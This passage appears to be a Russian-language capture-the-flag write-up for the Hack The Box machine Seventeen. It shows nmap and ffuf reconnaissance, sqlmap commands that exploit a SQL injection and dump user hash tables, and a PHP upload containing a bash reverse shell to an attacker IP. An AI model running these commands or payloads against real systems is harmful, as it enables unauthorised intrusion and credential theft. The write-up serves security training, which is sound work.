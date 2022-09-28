В этом рай­тапе я покажу, как соз­дать свой реестр NPM и раз­местить с ним вре­донос­ный пакет для зах­вата уда­лен­ной машины. Но нач­нем мы с SQL-инъ­екции, а затем заюзаем извес­тную RCE для повыше­ния при­виле­гий.

На­ша цель — зах­ват машины Seventeen с тре­ниро­воч­ной пло­щад­ки Hack The Box. Задание оце­нено как слож­ное.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 165 seventeen. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та. #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ви­дим три откры­тых пор­та:

22 — служ­ба OpenSSH 7.6p1;

80 — веб‑сер­вер Apache 2.4.29;

8000 — веб‑сер­вер Apache 2.4.38.

Нам дос­тупно сра­зу два веб‑сер­вера, с которых и нач­нем про­бивать периметр.

Ос­мотрев­шись на сай­те, находим под­твержде­ние тому, что в самом начале выб­рали вер­ное домен­ное имя.

Боль­ше ничего инте­рес­ного нет, поэто­му перей­дем к активно­му ска­ниро­ванию.

Точка входа

Итак, я поп­робую поис­кать скры­тые фай­лы и катало­ги. Делать это я буду при помощи ска­нера ffuf.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -fc — исклю­чить из резуль­тата отве­ты с кодом 403.

ffuf -u 'http:// seventeen. htb/ FUZZ' -t 256 -w directory_ 2. 3_ medium_ lowercase. txt

Ска­ниро­вание катало­гов ничего инте­рес­ного не дало. Дру­гих HTML-стра­ниц тоже не наш­лось. Оста­ется прос­каниро­вать под­домены. В этом слу­чае мы будем переби­рать заголо­вок Host в парамет­ре -H . Так как все отве­ты будут вес­ти на основной домен, можем их отфиль­тро­вать по раз­меру стра­ницы в парамет­ре --fs .

ffuf -u 'http:// seventeen. htb/ ' -t 256 -w subdomains- top1million- 110000. txt -H 'Host: FUZZ. seventeen. htb' --fs 20689

На­ходим один под­домен, запись для которо­го добав­ляем в / etc/ hosts .

10. 10. 11. 165 seventeen. htb exam. seventeen. htb

Exam Reviewer Management System

На сай­те нас встре­чает Exam Reviewer Management System, для которой мы лег­ко находим пуб­личный экс­пло­ит в базе Exploit-DB. Это SQL-инъ­екция.

Нам пре­дос­тавля­ют готовую наг­рузку, которой неп­ремен­но сто­ит вос­поль­зовать­ся. Пер­вым делом запус­тим sqlmap.

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' -p id --level 3

Sqlmap нашел наг­рузку, теперь получим базы дан­ных (параметр --dbs ).

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' -p id --dbs --level 3

От­меча­ем для себя, что на сер­вере исполь­зуют­ся и дру­гие плат­формы, вклю­чая Roundcube. Нач­нем с пер­вой базы, получим таб­лицы (параметр --tables ) из базы db_sfms (параметр -D ).

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' -D db_ sfms --tables

Да­вай сдам­пим (параметр --dump ) таб­лицы user и student (параметр -T ). Для быс­тро­ты исполь­зуем десять потоков (параметр --threads ).

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' --threads 10 -D db_ sfms -T user --dump

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' --threads 10 -D db_ sfms -T student --dump

По­лучи­ли мно­го хешей, что не может не радовать. Теперь перей­дем к базе erms_db и по при­выч­ному сце­нарию сна­чала узна­ем таб­лицы.

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' --threads 10 -D erms_ db --tables

Из этой базы тоже сдам­пим поль­зовате­лей.

sqlmap -u 'http:// exam. seventeen. htb/ ?p=take_exam& id=1' --threads 10 -D erms_ db -T users --dump

Кро­ме хешей, мы рас­кры­ваем каталог с ава­тара­ми, а это неиз­вес­тная до дан­ного момен­та дирек­тория на веб‑сер­вере — / oldmanagement ! Из Roundcube ничего не получа­ем, поэто­му с помощью онлай­новой базы кря­каем хеши.

По­луча­ем один пароль, с которым поп­робу­ем пой­ти на най­ден­ный сайт — School File Management System.

Точка опоры

Пос­ле авто­риза­ции видим заг­ружен­ный файл, который мы, конеч­но же, ска­чаем.

Нем­ного почитав про эту сис­тему, я узнал о воз­можнос­ти заг­рузить и выпол­нить файл на PHP. Файл будет рас­положен в катало­ге / files/ 31234/ . В качес­тве реверс‑шел­ла заг­ружа­ем прос­той скрипт:

< ?php system ( "bash -c 'bash -i > & / dev/ tcp/ 10. 10. 14. 16/ 4321 0> & 1'" ) ; ?>

Об­раща­емся к нашему скрип­ту по сле­дующе­му адре­су: